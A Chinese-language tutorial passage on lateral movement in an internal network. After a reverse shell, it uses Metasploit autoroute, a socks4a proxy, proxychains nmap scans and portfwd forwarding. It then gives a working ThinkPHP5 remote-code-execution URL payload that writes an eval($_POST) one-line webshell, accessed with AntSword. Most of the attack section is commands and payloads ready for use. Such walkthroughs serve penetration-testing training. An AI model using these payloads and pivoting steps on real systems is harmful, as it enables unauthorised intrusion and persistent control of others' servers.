”什么是内网穿透“详解( 二 ) _内网穿透

文章插图

文章插图

反弹shell成功，开始内网穿透

文章插图

meterpreter > ipconfig ###查看网卡ip

文章插图

0x002 搭建内网隧道横向渗透
meterpreter中添加好通向对方内网的路由
meterpreter > run autoroute -s 10.0.0.0/24meterpreter > route flush 不用的时候,记得删掉就行

文章插图

由于目标是linux的，所以直接进行下一步如果是windows跳板机可以用以下命令进行扫描内网机器run post/windows/gather/arp_scanner RHOSTS=10.0.0.0/24 windows：可以先通过arp扫描粗略的扫一眼目标内网的机器大概有多少msf>background 挂后台保持shell，开始下一步开启代理
msf exploit(handler) > use auxiliary/server/socks4a msf auxiliary(socks4a) > set 127.0.0.1msf auxiliary(socks4a) > set srvport 1080msf auxiliary(socks4a) > run

文章插图

然后apt install proxychains，我kali已经安装了所以直接
vim /etc/proxychains.conf

文章插图

添加 socks4 127.0.0.1 1080这样msf本地开启socks4穿透，通过shell，转发到跳板机的机器
proxychains nmap -sT -sV -Pn -n -p80 10.0.0.0/24 ###通过跳板机扫描内网

文章插图

发现 10.0.0.0/24段有个几台活跃ip,新建终端：proxychains firefox ####通过代理打开火狐浏览器

文章插图

通过web跳板机访问到10.0.0.3，但是问题来了，目标内网有一台漏洞主机10.0.0.3，但是用菜刀或者蚂剑无法直接连接，所以有两个办法：
1.通过proxy代理启动蚁剑或者菜刀 2.目标机内网端口转发使用portfwd模块(Metasploit中的一个post模块)可完成端口转发
meterpreter > portfwd -hUsage: portfwd [-h] [add | delete | list | flush] [args]OPTIONS: -L <opt> Forward: local host to listen on (optional). Remote: local host to connect to. -R Indicates a reverse port forward. -h Help banner. -i <opt> Index of the port forward entry to interact with (see the "list" command). -l <opt> Forward: local port to listen on. Reverse: local port to connect to. -p <opt> Forward: remote port to connect to. Reverse: remote port to listen on. -r <opt> Forward: remote host to connect to.meterpreter > portfwd add -L 本地ip -l 本机端口 -p 目标内网端口 -r 目标内网
所以要建立一条线路用，msf 把本机某个端口直接转发到目标内网端口
攻击者本机<端口转发>>>>>跳板机>>>>>>目标机内网

文章插图

现在无需任何代理，直接访问本机127.0.0.1:5000 就能访问到目标机内网

文章插图

现在内网穿透拓扑结构就是
127.0.0.1:5000<>socks4:主站的shll<>内网10.0.0.3:80 本地端口 socks4 内网127.0.0.1:5000=10.0.0.3:800x003 多层跳板机穿透
现在对内网10.0.0.3进行渗透和提权，也就是127.0.0.1:5000
内网10.0.0.3是一台包含ThinkPHP5 5.0.22/5.1.29 远程代码执行漏洞的机器
直接访问http://your-ip/index.php?s=/Index/thinkapp/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=-1，即可执行phpinfo：

文章插图

写入一句话shell就是
http://your-ip//index.php?s=/index/thinkapp/invokefunction&function=call_user_func_array&vars[0]=file_put_contents&vars[1][]=shell.php&vars[1][]=%3C?php%20@eval($_POST%5B-7%5D);?%3E蚁剑连接shell：127.0.0.1:5000/shell.php